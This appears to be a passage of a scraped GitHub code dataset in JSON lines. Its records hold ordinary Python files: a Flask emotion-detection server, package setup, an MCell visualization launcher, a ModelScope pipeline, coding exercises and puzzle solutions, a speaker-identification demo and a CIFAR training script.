Decode image.\n byte_data = base64.b64decode(value)\n image_data = BytesIO(byte_data)\n img = Image.open(image_data)\n \n # Some fancy processing here....\n state, values = process.run(img)\n\n # Store results.\n frame_i = []\n if state:\n for i,out in enumerate(values):\n if i in emotion_indexes:\n frame_i.append(out.item())\n \n result.append(frame_i)\n else:\n print (\"Error: Unable to process this frame\")\n # sys.exit(0)\n # Report results\n result = np.array(result)\n \n # build a response dict to send back to client\n result_mean = np.mean(result, axis=0)\n response = {}\n k = 0\n for i in emotion_indexes:\n response[_all_emotions[i]] = result_mean[k]\n k += 1\n \n # encode response using jsonpickle\n response_pickled = jsonpickle.encode(response)\n\n return Response(response=response_pickled, status=200, mimetype=\"application/json\")\n\n\n# start flask app\napp.run(host=\"0.0.0.0\", port=5000)","repo_name":"Evraa/Graduation-Project-Separate-Modules","sub_path":"models/emotion_detection/test/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2493,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4060298003","text":"import setuptools\n\nwith open(\"README.md\", \"r\", encoding=\"utf-8\") as fh:\n long_description = fh.read()\n\nrequirements = [\n \"paho-mqtt==1.5.1\"\n]\n\n\nsetuptools.setup(\n name=\"open-iot-GanjeCo\",\n version=\"0.0.1\",\n author=\"Mostafa Ghofrani\",\n author_email=\"mostafa_gho@yahoo.com\",\n description=\"A light iot package to define Device and Things\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/GanjeCo/open-iot\",\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n ],\n install_requires=requirements,\n packages=setuptools.find_packages(),\n python_requires='>=3.6',\n)","repo_name":"GanjeCo/open-iot","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":769,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"17176318215","text":"import sys\nimport os\nimport platform\nimport subprocess\n\nMCELL_PATH = os.environ.get('MCELL_PATH', '')\nif MCELL_PATH:\n lib_path = os.path.join(MCELL_PATH, 'lib')\n if os.path.exists(os.path.join(lib_path, 'mcell.so')) or \\\n os.path.exists(os.path.join(lib_path, 'mcell.pyd')):\n sys.path.append(lib_path)\n else:\n print(\"Error: Python module mcell.so or mcell.pyd was not found in \"\n \"directory '\" + lib_path + \"' constructed from system variable \"\n \"MCELL_PATH.\")\n sys.exit(1)\nelse:\n print(\"Error: system variable MCELL_PATH that is used to find the mcell \"\n \"library was not set.\")\n sys.exit(1)\n \n \nif len(sys.argv) != 2:\n sys.exit(\"Expecing one argument that is the path to the viz output directory, e.g. 
viz_data/seed_00001/\")\n\n \nREL_BLENDER_PATH = None\n\n\nif platform.system() == 'Darwin':\n REL_BLENDER_PATH = os.path.join(MCELL_PATH, '..', '..', '..', '..', '..', '..', '..', '..', '..')\nelse:\n REL_BLENDER_PATH = os.path.join(MCELL_PATH, '..', '..', '..', '..', '..', '..')\n \nABS_BLENDER_PATH = os.path.abspath(REL_BLENDER_PATH)\n\n\nif platform.system() == 'Darwin':\n VIZ_MCELL_SCRIPT = \\\n os.path.join(ABS_BLENDER_PATH, 'blender.app', 'Contents', 'Resources', '2.93', 'scripts', 'addons', 'cellblender', 'developer_utilities', 'mol_viz_scripts', 'viz_mcell_run.py')\nelse:\n VIZ_MCELL_SCRIPT = \\\n os.path.join(ABS_BLENDER_PATH, '2.93', 'scripts', 'addons', 'cellblender', 'developer_utilities', 'mol_viz_scripts', 'viz_mcell_run.py')\n\n\nif 'Windows' in platform.system():\n CMD = os.path.join(ABS_BLENDER_PATH, 'blender.exe') \nelse:\n CMD = 'bash ' + os.path.join(ABS_BLENDER_PATH, 'my_blender')\n\nCMD += ' -P ' + VIZ_MCELL_SCRIPT + ' -- ' + sys.argv[1]\n\nsubprocess.run(CMD, shell=True)\n ","repo_name":"mcellteam/mcell","sub_path":"utils/visualize/visualize.py","file_name":"visualize.py","file_ext":"py","file_size_in_byte":1813,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"48"} +{"seq_id":"23947546012","text":"from typing import Any, Dict\n\nimport numpy as np\nimport torch\nimport torch.nn.functional as F\nimport torchvision.transforms as transforms\n\nfrom modelscope.metainfo import Pipelines\nfrom modelscope.outputs import OutputKeys\nfrom modelscope.pipelines.base import Input, Pipeline\nfrom modelscope.pipelines.builder import PIPELINES\nfrom modelscope.preprocessors import LoadImage\nfrom modelscope.utils.constant import Tasks\nfrom modelscope.utils.logger import get_logger\n\nlogger = get_logger()\n\n\n@PIPELINES.register_module(\n Tasks.vision_efficient_tuning,\n module_name=Pipelines.vision_efficient_tuning)\nclass VisionEfficientTuningPipeline(Pipeline):\n\n def __init__(self, model: str, **kwargs):\n \"\"\"\n use `model` to create a vision efficient tuning pipeline for prediction\n Args:\n model: model id on modelscope hub.\n Example:\n >>> from modelscope.pipelines import pipeline\n >>> petl_pipeline = pipeline('vision-efficient-tuning',\n 'damo/cv_vitb16_classification_vision-efficient-tuning-adapter')\n >>> result = petl_pipeline(\n 'data/test/images/vision_efficient_tuning_test_1.png')\n >>> print(f'Output: {result}.')\n \"\"\"\n super().__init__(model=model, **kwargs)\n\n self.device = 'cuda' if torch.cuda.is_available() else 'cpu'\n self.model = self.model.to(self.device)\n self.model.eval()\n self.transform = transforms.Compose([\n transforms.Resize(224),\n transforms.ToTensor(),\n transforms.Normalize(\n mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])\n ])\n\n def preprocess(self, input: Input) -> Dict[str, Any]:\n img = LoadImage.convert_to_img(input)\n data = self.transform(img).unsqueeze(0).to(self.device)\n return data\n\n def forward(self, input: Dict[str, Any]) -> Dict[str, Any]:\n with torch.no_grad():\n results = self.model(input)\n return results\n\n def postprocess(self, inputs: Dict[str, Any]) -> Dict[str, Any]:\n scores = F.softmax(inputs, dim=1).cpu().numpy()\n pred_scores = np.sort(scores, axis=1)[0][::-1][:5]\n pred_labels = np.argsort(scores, axis=1)[0][::-1][:5]\n\n result = {\n 'pred_score': [score for score in pred_scores],\n 'pred_class': [self.model.CLASSES[label] for label in pred_labels]\n }\n\n outputs = {\n OutputKeys.SCORES: result['pred_score'],\n OutputKeys.LABELS: 
result['pred_class']\n }\n return outputs\n","repo_name":"open-models-platform/open.models.llm-rlhf","sub_path":"modelscope/modelscope/pipelines/cv/vision_efficient_tuning_pipeline.py","file_name":"vision_efficient_tuning_pipeline.py","file_ext":"py","file_size_in_byte":2594,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"12860839987","text":"# Creating a map with 3 rows and 3 columns.\nrow1 = [\"⬜️\",\"️⬜️\",\"️⬜️\"]\nrow2 = [\"⬜️\",\"⬜️\",\"️⬜️\"]\nrow3 = [\"⬜️️\",\"⬜️️\",\"⬜️️\"]\nmap = [row1, row2, row3]\n\nprint(f\"{row1}\\n{row2}\\n{row3}\")\nposition = input(\"Where do you want to put the treasure? \")\n# Taking the input from the user and putting it into the map.\n\ny = int(position[0])\nx = int(position[1])\nmap[x-1][y-1] = \"x\"\n\nprint(f\"{row1}\\n{row2}\\n{row3}\")","repo_name":"armand-abasllari/100-Days-of-Python","sub_path":"100 Days of Code/Beginer/Day 04 - Beginner - Randomisation and Python Lists/Exercises/Exercise 3 - Treasure Map.py","file_name":"Exercise 3 - Treasure Map.py","file_ext":"py","file_size_in_byte":447,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"8152659487","text":"\nimport os\nos.chdir('C:\\\\Users\\\\mathi\\\\Desktop\\\\PiB')\n\nimport pandas as pd\nimport Data.wrangling\n\n\n#### DOWNLOAD AND CREATE DATAFRAMES #####\n\ndatasets = ['GPL96', 'GPL570', 'GPL8432', 'GPL10379', 'GPL10558', 'GPL15659']\ndownload = True\n\nfor data in datasets:\n\n # Filter dataframe\n dataset_info = pd.read_excel('dataset_information.xlsx', sheet_name = 'dataset_information')\n df_sample = dataset_info[(dataset_info.Platform_id == data) & (dataset_info.Sample_label == 'Metastasis Tumor') & (dataset_info.Metastasis_site != 'unknown')]\n df_sample = df_sample.rename(columns={'Sample_id': 'Sample'})\n df_sample = df_sample[['Sample', 'Cancer_type', 'Primary_site', 'Metastasis_site', 'Sample_label']]\n df_sample = df_sample.drop_duplicates()\n \n # Collect data into pd-dataframe from sample-list\n samples = set(df_sample.Sample.tolist())\n df_geneexp = Data.wrangling.GSM_data(samples, download = download, filepath = str('./Samples/' + data + '/'), silent = True).df\n df_merged = pd.merge(df_sample, df_geneexp, on='Sample', how='inner')\n df_merged.to_csv(str('./Samples/' + data + '/' + data + '.csv'), header = True, index = False)\n \n\n# NO. 
SAMPLES!\n\n # GPL96: 167\n # GPL570: 192\n # GPL8432: 104\n # GPL10379: 207\n # GPL10558: 263\n # GPL15659: 145\n\n\n#### LOAD ALREADY EXISTING DATAFRAMES #####\n \nGPL96 = pd.read_csv('./Data/Samples/GPL96/GPL96.csv', header = 0, index_col = False)\nGPL570 = pd.read_csv('./Data/Samples/GPL570/GPL570.csv', header = 0, index_col = False)\nGPL8432 = pd.read_csv('./Data/Samples/GPL8432/GPL8432.csv', header = 0, index_col = False)\nGPL10379 = pd.read_csv('./Data/Samples/GPL10379/GPL10379.csv', header = 0, index_col = False)\nGPL10558 = pd.read_csv('./Data/Samples/GPL10558/GPL10558.csv', header = 0, index_col = False)\nGPL15659 = pd.read_csv('./Data/Samples/GPL15659/GPL15659.csv', header = 0, index_col = False)\n\n\n\n#### MERGES BETWEEN DATAFRAMES ####\n\ndf_GPL96_GPL570 = pd.concat([GPL96, GPL570], join = 'inner')\ndf_GPL8432_GPL10558 = pd.concat([GPL8432, GPL10558], join = 'inner')\n\ndf_GPL96_GPL570.to_csv('./Data/Samples/GPL96_GPL570/GPL96_GPL570.csv', header = True, index = False)\n\n#### CREATE VALIDATION SET ####\nimport numpy as np\n\nfrac = np.random.rand(len(df_GPL96_GPL570)) < 0.85\n\n\ntrain = df_GPL96_GPL570[frac] # n = 308\nvalidation = df_GPL96_GPL570[~frac] # n = 51\n\n# Save to .csv-file\ntrain.to_csv(str('./Data/Samples/' + 'GPL96_GPL570' + '/' + 'GPL96_GPL570' + '.csv'), header = True, index = False)\nvalidation.to_csv(str('./Data/Samples/' + 'GPL96_GPL570' + '/' + 'GPL96_GPL570_VALIDATION' + '.csv'), header = True, index = False)\n\n\n# POSSIBLE MERGES!\n # GPL96 + GPL570: 359\n # (MAYBE: + GPL10379): 566\n # GPL8432 + 10558: 367\n","repo_name":"mathiasbyskov/PiB","sub_path":"Data/datasets.py","file_name":"datasets.py","file_ext":"py","file_size_in_byte":2752,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"40245255336","text":"#! 
python3.5\r\n#Search on wowhead from \"run\" (start + r)\r\nimport sys, webbrowser, pyperclip\r\n\r\n#Check length if only 1 paste whatever is in clipboard, else you've probably pasted it in or written something youself\r\nif len(sys.argv) > 1:\r\n search = \" \".join(sys.argv[1:]) #takes index 1 and after and put into search\r\nelse:\r\n search = pyperclip.paste() #puts whatever is in the clipboard into search\r\n\r\n#opens the default browser, and searches on wowhead for the input\r\nwebbrowser.open(\"http://www.wowhead.com/search?q=\" + search)\r\n","repo_name":"Thomrl/Wowhead.py-search","sub_path":"wowhead.py","file_name":"wowhead.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"3138173991","text":"class Solution:\n def __init__(self):\n self.mem = dict()\n\n def isScramble(self, s1: str, s2: str) -> bool:\n if (s1, s2) in self.mem:\n return self.mem[(s1, s2)]\n # print(f'isScramble({s1}, {s2})')\n for k in range(2):\n if s1 == s2:\n return True\n ctr1 = Counter()\n ctr2 = Counter()\n for i, (a, b) in enumerate(zip(s1[:-1], s2[:-1])):\n # print(i, a, b)\n ctr1 += {a: 1}\n ctr2 += {b: 1}\n if ctr1 == ctr2 and \\\n self.isScramble(s1[:i+1], s2[:i+1]) and \\\n self.isScramble(s1[i+1:], s2[i+1:]):\n self.mem[(s1, s2)] = True\n return self.mem[(s1, s2)]\n s1 = s1[::-1]\n self.mem[(s1, s2)] = False\n return self.mem[(s1, s2)]\n \n","repo_name":"fish-ball/leetcode","sub_path":"algorithms/leet.0087.src.1.py","file_name":"leet.0087.src.1.py","file_ext":"py","file_size_in_byte":890,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"19251023901","text":"import collections\n\ndef mostVisitedPattern(username: List[str], timestamp: List[int], website: List[str]) -> List[str]:\n data = list(zip(username, timestamp, website))\n data.sort(key=lambda i: i[1])\n\n usermap = collections.defaultdict(list)\n for un, ts, ws in data:\n usermap[un].append(ws)\n\n tuple_counter = collections.defaultdict(lambda: 0)\n\n for _, visits in usermap.items():\n visit_tuple = set()\n l = len(visits)\n\n for i in range(0, l):\n for j in range(i + 1, l):\n for k in range(j + 1, l):\n visit_tuple.add((visits[i], visits[j], visits[k]))\n\n for i in visit_tuple:\n tuple_counter[i] += 1\n\n max_count = max(tuple_counter.values())\n result = None\n for t, c in tuple_counter.items():\n if c == max_count:\n result = t if result is None else min(result, t)\n\n return result\n","repo_name":"xis19/leetcode","sub_path":"1152.py","file_name":"1152.py","file_ext":"py","file_size_in_byte":912,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"39773986019","text":"from collections import deque\n\n\ndef move(x, y, dx, dy):\n cnt = 0\n while board[x + dx][y + dy] != '#' and board[x][y] != 'O':\n x += dx\n y += dy\n cnt += 1\n return x, y, cnt\n\n\ndef bfs(rx, ry, bx, by):\n queue = deque()\n queue.append((rx, ry, bx, by, 1))\n visited[rx][ry][bx][by] = True\n dxy = [(-1, 0), (1, 0), (0, 1), (0, -1)]\n while queue:\n rx, ry, bx, by, depth = queue.popleft()\n if depth > 10:\n break\n for dx, dy in dxy:\n new_rx, new_ry, rcnt = move(rx, ry, dx, dy)\n new_bx, new_by, bcnt = move(bx, by, dx, dy)\n if board[new_bx][new_by] != 'O': # 전제 조건은 블루는 빠지면안된다\n if board[new_rx][new_ry] == 'O': # 그리고 빨간구슬이 빠졋다면 게임끝낸다\n return depth\n # 이제 게임이 아직 끝나지 않았을 경우의 수를 계산한다\n if new_rx == new_bx and new_ry == new_by: # 빨간구슬과 블루구슬의 위치가 같다면 
좌표변경한다\n if rcnt > bcnt:\n new_rx -= dx\n new_ry -= dy\n else:\n new_bx -= dx\n new_by -= dy\n if not visited[new_rx][new_ry][new_bx][new_by]: # 현재 위치가 체크된 백업이엇다면\n visited[new_rx][new_ry][new_bx][new_by] = True # 체크하고\n queue.append((new_rx, new_ry, new_bx, new_by, depth + 1)) # 탐색 시작한다\n return -1\n\n\nif __name__ == '__main__':\n row, col = map(int, input().split())\n board = [list(input().strip()) for _ in range(row)]\n visited = [[[[False] * col for _ in range(row)] for _ in range(col)] for _ in range(row)]\n for i in range(row):\n for j in range(col):\n if board[i][j] == 'R':\n rx, ry = i, j\n if board[i][j] == 'B':\n bx, by = i, j\n print(bfs(rx, ry, bx, by))\n","repo_name":"rio1004666/ProblemSolving","sub_path":"구슬탈출2.py","file_name":"구슬탈출2.py","file_ext":"py","file_size_in_byte":2025,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"26251302279","text":"# !pip install resemblyzer - done\r\n# !pip install pyeer - done\r\n# !pip install ffmpeg-python - done\r\n\r\nimport numpy as np\r\nfrom resemblyzer import preprocess_wav, VoiceEncoder\r\nfrom itertools import groupby\r\nfrom pathlib import Path\r\nfrom tqdm import tqdm\r\nfrom pywebio.input import *\r\nfrom pywebio.output import *\r\nimport pyaudio\r\nimport wave\r\nfrom sklearn.metrics.pairwise import cosine_similarity, cosine_distances\r\n\r\nput_markdown('## Speaker Identification Demo')\r\n\r\n# function for audio recording\r\n\r\n@use_scope('recorder_scope', clear=True)\r\ndef recorder(name, recording_number, record_seconds):\r\n\r\n # the file name output you want to record into\r\n filename = str(name) + str(recording_number) + \".wav\"\r\n # set the chunk size of 1024 samples\r\n chunk = 1024\r\n # sample format\r\n FORMAT = pyaudio.paInt16\r\n # mono, change to 2 if you want stereo\r\n channels = 1\r\n # 44100 samples per second\r\n sample_rate = 44100\r\n # record_seconds = 5\r\n # initialize PyAudio object\r\n p = pyaudio.PyAudio()\r\n # open stream object as input & output\r\n stream = p.open(format=FORMAT,\r\n channels=channels,\r\n rate=sample_rate,\r\n input=True,\r\n output=True,\r\n frames_per_buffer=chunk)\r\n frames = []\r\n put_text(\"Recording\")\r\n for i in range(int(sample_rate / chunk * record_seconds)):\r\n\r\n data = stream.read(chunk)\r\n # if you want to hear your voice while recording\r\n # stream.write(data)\r\n frames.append(data)\r\n put_text(\"Finished recording.\")\r\n # stop and close stream\r\n stream.stop_stream()\r\n stream.close()\r\n\r\n # terminate pyaudio object\r\n p.terminate()\r\n # save audio file\r\n # open the file in 'write bytes' mode\r\n wf = wave.open(filename, \"wb\")\r\n # set the channels\r\n wf.setnchannels(channels)\r\n # set the sample format\r\n wf.setsampwidth(p.get_sample_size(FORMAT))\r\n # set the sample rate\r\n wf.setframerate(sample_rate)\r\n # write the frames as bytes\r\n wf.writeframes(b\"\".join(frames))\r\n # close the file\r\n wf.close()\r\n\r\n# validation for number of users\r\n\r\n\r\ndef user_validation(number_of_users):\r\n if number_of_users < 2:\r\n return \"Please enter a number greater than 1\"\r\n\r\n# validation for number of audios\r\n\r\n\r\ndef audio_validation(number_of_audios):\r\n if number_of_audios < 1:\r\n return \"Please enter a number greater than 0\"\r\n if number_of_audios > 4:\r\n return \"Please enter a number less than 5\"\r\n\r\n# validation for username\r\n\r\n\r\ndef username_validation(username):\r\n if username == \"\":\r\n return \"You can't have no name. 
Please enter something.\"\r\n\r\n\r\n# start record func\r\n\r\n\r\n@use_scope(\"button_scope\", clear=True)\r\ndef start_record(number_of_audios, username, length_of_recording, aud_num):\r\n if aud_num <= number_of_audios:\r\n message = 'Start Recording ' + \\\r\n str(username) + \"\\'s \" + 'Audio Number ' + str(aud_num)\r\n put_button(message, onclick=lambda: recorder(\r\n username, aud_num, length_of_recording))\r\n confirm = actions('Confirm to save audio?', [\r\n 'Confirm'], help_text='You will not be able to resubmit audio')\r\n clear(\"recorder_scope\")\r\n if confirm == 'Confirm':\r\n aud_num += 1\r\n start_record(number_of_audios, username,\r\n length_of_recording, aud_num)\r\n else:\r\n confirm = actions('Registration for ' +\r\n str(username) + ' complete!', ['Next'])\r\n return\r\n\r\n# register one user attempt 2\r\n\r\n\r\nusername_list = []\r\n\r\n# made dictionary for users with username \r\nusers_dict = {}\r\n\r\ndef register_user(number_of_audios, length_of_recording, aud_num=1):\r\n username = input(\"Enter name for this user:\", validate=username_validation)\r\n username_list.append(username)\r\n aud_num = 1\r\n start_record(number_of_audios, username, length_of_recording, aud_num)\r\n\r\n# register all users\r\n@use_scope('register_all_scope')\r\ndef register_all(number_of_users, number_of_audios, length_of_recording, user_num):\r\n if user_num <= number_of_users:\r\n register_user(number_of_audios, length_of_recording, aud_num=1)\r\n user_num += 1\r\n register_all(number_of_users, number_of_audios,\r\n length_of_recording, user_num)\r\n else:\r\n confirm = actions('Registration for all complete!', ['Next'])\r\n return\r\n\r\n\r\n@use_scope(\"loading_scope\")\r\ndef loading():\r\n put_text(\"Processing...\")\r\n\r\n# resemblyzer --------------------------------------------------------------\r\n\r\n\r\nspeaker_embed_list = []\r\nencoder = VoiceEncoder()\r\n\r\n\r\n@use_scope('resemblyzer_scope', clear=True)\r\ndef resemblyzer_magic(number_of_audios):\r\n # Group the wavs per speaker and load them using the preprocessing function provided with\r\n # resemblyzer to load wavs in memory. 
It normalizes the volume, trims long silences and resamples\r\n # the wav to the correct sampling rate.\r\n speaker_wavs_list = []\r\n wav_fpaths = []\r\n for name in username_list:\r\n for i in range(number_of_audios):\r\n x = i+1\r\n path = str(name) + str(x) + '.wav'\r\n # get the paths where audio files are saved\r\n wav_fpaths.append(Path(path))\r\n print(\"wav_fpaths \", wav_fpaths)\r\n # pre-processed audios ki dictionary banjati with speaker as key and audio as pair\r\n speaker_wavs = {speaker: list(map(preprocess_wav, wav_fpaths)) for speaker, wav_fpaths in\r\n groupby(tqdm(wav_fpaths, \"Preprocessing wavs\", len(wav_fpaths), unit=\"wavs\"),\r\n lambda wav_fpath: wav_fpath.parent.stem)}\r\n print(\"speaker_wavs \", speaker_wavs)\r\n speaker_wavs_list.append(speaker_wavs)\r\n print(\"speaker_wavs_list \", speaker_wavs_list)\r\n\r\n\r\n # make a list of the pre-processed audios ki arrays\r\n for sp_wvs in speaker_wavs_list:\r\n speaker_embed_list.append(\r\n np.array([encoder.embed_speaker(wavs) for wavs in sp_wvs.values()]))\r\n\r\n\r\n@use_scope('test_scope', clear=True)\r\ndef test_pp():\r\n loading()\r\n # does the same as above for the test file\r\n # hm list(Path(\"test1.wav\")) hona chahiye but Path object is not iterable\r\n wav_fpaths = []\r\n test_fpath = Path(\"test1.wav\")\r\n wav_fpaths.append(test_fpath)\r\n test_pos_wavs = {speaker: list(map(preprocess_wav, wav_fpaths)) for speaker, wav_fpaths in\r\n groupby(tqdm(wav_fpaths, \"Preprocessing wavs\", len(wav_fpaths), unit=\"wavs\"),\r\n lambda wav_fpath: wav_fpath.parent.stem)}\r\n test_pos_emb = np.array([encoder.embed_speaker(wavs)\r\n for wavs in test_pos_wavs.values()])\r\n\r\n # calculates cosine similarity between the ground truth (test file) and registered audios\r\n speakers = {}\r\n val = 0\r\n for spkr_embd in speaker_embed_list:\r\n key_val = username_list[val]\r\n spkr_sim = cosine_similarity(spkr_embd, test_pos_emb)[0][0]\r\n speakers[key_val] = spkr_sim\r\n val += 1\r\n\r\n norm = [float(i)/sum(speakers.values()) for i in speakers.values()]\r\n for i in range(len(norm)):\r\n key_val = username_list[i]\r\n speakers[key_val] = norm[i]\r\n\r\n clear(\"loading_scope\")\r\n remove(\"loading_scope\")\r\n identified = max(speakers, key=speakers.get)\r\n print(\"\\nThe identity of the test speaker:\\n\", identified, \"with a similarity with test of\",\r\n speakers[identified]*100, \"percent match as compared to all.\")\r\n put_markdown('## Test Audio Belonged To: {}'.format(identified))\r\n# -------------------------------------------------------------------\r\n\r\n\r\n@use_scope('test_scope', clear=True)\r\ndef test_taking(length_of_recording):\r\n put_button(\"Record Test Audio\", onclick=lambda: recorder(\r\n \"test\", 1, length_of_recording))\r\n test_save = actions('Confirm to save audio?', [\r\n 'Confirm'], help_text='You will not be able to resubmit audio')\r\n\r\n\r\n@use_scope('pp_load', clear=True)\r\ndef pp_load():\r\n put_text(\"Please Wait. 
Processing registration audios.\")\r\n\r\n\r\nnumber_of_users = input(\"Enter the number of users for this session:\",\r\n type=NUMBER, validate=user_validation)\r\n\r\nnumber_of_audios = input(\r\n \"Enter the number of audios each user will register:\", type=NUMBER, validate=audio_validation)\r\n\r\nlength_of_recording = select(\r\n label=\"Select the length of each recording (in seconds)\", options=[3, 5, 7])\r\n\r\nregister_all(number_of_users, number_of_audios, length_of_recording, 1)\r\npp_load()\r\nresemblyzer_magic(number_of_audios)\r\n\r\nclear(\"pp_load\")\r\nremove(\"pp_load\")\r\n\r\nclear(\"register_all_scope\")\r\nremove(\"register_all_scope\")\r\n\r\nclear(\"recorder_scope\")\r\nremove(\"recorder_scope\")\r\n\r\nput_markdown('## Test Audio Time')\r\n\r\ntest_taking(length_of_recording)\r\nclear(\"test_scope\")\r\nremove(\"test_scope\")\r\n\r\nclear(\"recorder_scope\")\r\nremove(\"recorder_scope\")\r\n\r\ngenerate_button = actions(\r\n 'Click to perform Speaker Recognition Magic', ['Generate Result!'])\r\nif generate_button == 'Generate Result!':\r\n test_pp()\r\n\r\n# clear(\"resemblyzer_scope\")\r\n# remove(\"resemblyzer_scope\")\r\n\r\nwhile(True):\r\n again = select(\r\n label=\"Do you want to enroll another test audio?\", options=[\"Yes\", \"No\"])\r\n if again == \"Yes\":\r\n test_taking(length_of_recording)\r\n clear(\"test_scope\")\r\n remove(\"test_scope\")\r\n\r\n clear(\"recorder_scope\")\r\n remove(\"recorder_scope\")\r\n\r\n generate_button = actions(\r\n 'Click to perform Speaker Recognition Magic', ['Generate Result!'])\r\n if generate_button == 'Generate Result!':\r\n test_pp()\r\n else:\r\n put_text(\"Thank you for trying out our system!\")\r\n break\r\n\r\n#register_user(number_of_audios, length_of_recording, 1)\r\n\r\n#register_all(number_of_users, number_of_audios, length_of_recording)\r\n\r\n#put_button('Start Recording Test Audio', onclick=lambda: recorder(\"test\", 1, length_of_recording))\r\n","repo_name":"Qa5imm/Speaker-identification","sub_path":"speakerid-csalt-no-api/speakerid.py","file_name":"speakerid.py","file_ext":"py","file_size_in_byte":10057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"10992145406","text":"'''Train CIFAR with PyTorch.'''\r\n\r\nimport torch.optim as optim\r\nimport time\r\nimport torch.backends.cudnn as cudnn\r\nfrom opt.utils import *\r\n\r\n\r\nfrom data.load import *\r\nfrom models import *\r\nfrom tensorboardX import SummaryWriter\r\nfrom torch.autograd import Variable\r\nimport argparse\r\nimport os\r\nos.environ['CUDA_VISIBLE_DEVICES'] = '0,1,2,3'\r\n\r\nparser = argparse.ArgumentParser(description='PyTorch CIFAR10 Training')\r\nparser.add_argument('--learning_rate','-lr', default=0.01, type=float, help='learning rate')\r\nparser.add_argument('--scale',default=1.0, type=float, help='scale')\r\nparser.add_argument('-b', '--batchsize', default=128, type=int, metavar='N', help='mini-batch size (default: 64)')\r\nparser.add_argument('--c_tag','-c',default=1.0, type=float, help='c_tag')\r\nparser.add_argument('--input_size',default=32, type=int, help='input_size')\r\nparser.add_argument('--resume', '-r', action='store_true', help='resume from checkpoint')\r\nparser.add_argument('--test', '-t', action='store_true', help='test')\r\nparser.add_argument('--data', '-d',default='cifar100',type=str, help='load_data')\r\nparser.add_argument('--save', '-s',default='mobilenetv2',type=str, help='save_model')\r\nparser.add_argument('--gpus', default='0', help='List of 
GPUs used for training - e.g 0,1,3')\r\nparser.add_argument('--lr_decay', type=float, default=0.1, help='Weight decay for learning rate.')\r\nparser.add_argument('--step', type=int, default=60, help='lr decrease after step')\r\nparser.add_argument('--type', default='float32', help='Type of tensor: float32, float16, float64. Default: float32')\r\nargs = parser.parse_args()\r\n\r\ndef train(model, epoch, checkPoint, savePoint, modelPath, curEpoch=0, best_acc = 0, useCuda=True,\r\n adjustLR = True, earlyStop=True, tolearnce=4):\r\n tolerance_cnt = 0\r\n tolerance_loss = 0\r\n step = 0\r\n if useCuda:\r\n model = model.cuda()\r\n ceriation = nn.CrossEntropyLoss()\r\n # ceriation=Weighted_LOSS()\r\n # optimizer = optim.Adam(net.parameters(), lr=args.lr)\r\n optimizer = optim.SGD(net.parameters(), lr=args.learning_rate, momentum=0.9, weight_decay=5e-4)\r\n\r\n for i in range(curEpoch, curEpoch+epoch):\r\n best_epoch=curEpoch\r\n model.train()\r\n # trainning\r\n sum_loss = 0\r\n # adjust_batchsize(args, 60, epoch=i)\r\n trainLoader, testLoader = load_data(args, batchSize=args.batchsize, device=6)\r\n if args.test:\r\n test(net,testLoader,True)\r\n else:\r\n for batch_idx, (x, target) in enumerate(trainLoader):\r\n optimizer.zero_grad()\r\n if adjustLR:\r\n adjust_learning_rate(args,optimizer,i)\r\n if useCuda:\r\n x, target = x.cuda(), target.cuda()\r\n x, target = Variable(x), Variable(target)\r\n out = model(x)\r\n loss = ceriation(out, target)\r\n sum_loss += loss.item()\r\n loss.backward()\r\n optimizer.step()\r\n step += 1\r\n writer.add_scalar('model/train_loss', loss.item(), (i + 1) * (batch_idx + 1))\r\n if (batch_idx + 1) % checkPoint == 0 or (batch_idx + 1) == len(trainLoader):\r\n print('==>>> epoch: {}, batch index: {}, step: {}, train loss: {:.6f}'.format\r\n (i, batch_idx + 1, step, sum_loss/(batch_idx+1)))\r\n\r\n acc = test(net,dataloade=testLoader,useCuda=True)\r\n # train_acc=test(net,trainLoader,useCuda=True)\r\n # writer.add_scalar('model/train_acc', train_acc, (i + 1))\r\n writer.add_scalar('model/test_acc', acc, (i + 1))\r\n\r\n # early stopping\r\n if earlyStop:\r\n if acc < best_acc:\r\n tolerance_cnt += 1\r\n else:\r\n best_acc = acc\r\n best_epoch=i\r\n tolerance_cnt = 0\r\n saveModel(model, best_epoch, best_acc, modelPath)\r\n\r\n if tolerance_cnt >= tolearnce:\r\n print(\"early stopping training....\")\r\n saveModel(model, best_epoch, best_acc, modelPath)\r\n return\r\n else:\r\n if best_acc < acc:\r\n best_epoch=i\r\n saveModel(model, best_epoch, acc, modelPath)\r\n best_acc = acc\r\n writer.close()\r\n # saveModel(model, epoch, best_acc, modelPath)\r\n\r\ndef test(model,dataloade,useCuda=True):\r\n correct_cnt, sum_loss = 0, 0\r\n total_cnt = 0\r\n model.eval()\r\n\r\n if useCuda:\r\n model=model.cuda()\r\n # start=time.time()\r\n for batch_idx, (x, target) in enumerate(dataloade):\r\n with torch.no_grad():\r\n x, target = Variable(x), Variable(target)\r\n # x, target = Variable(x, volatile=True), Variable(target, volatile=True)\r\n if useCuda:\r\n x, target = x.cuda(), target.cuda()\r\n out = model(x)\r\n\r\n _, pred_label = torch.max(out.data, 1)\r\n total_cnt += x.data.size()[0]\r\n correct_cnt += (pred_label == target.data).sum()\r\n correct_cnt = correct_cnt.item()\r\n # 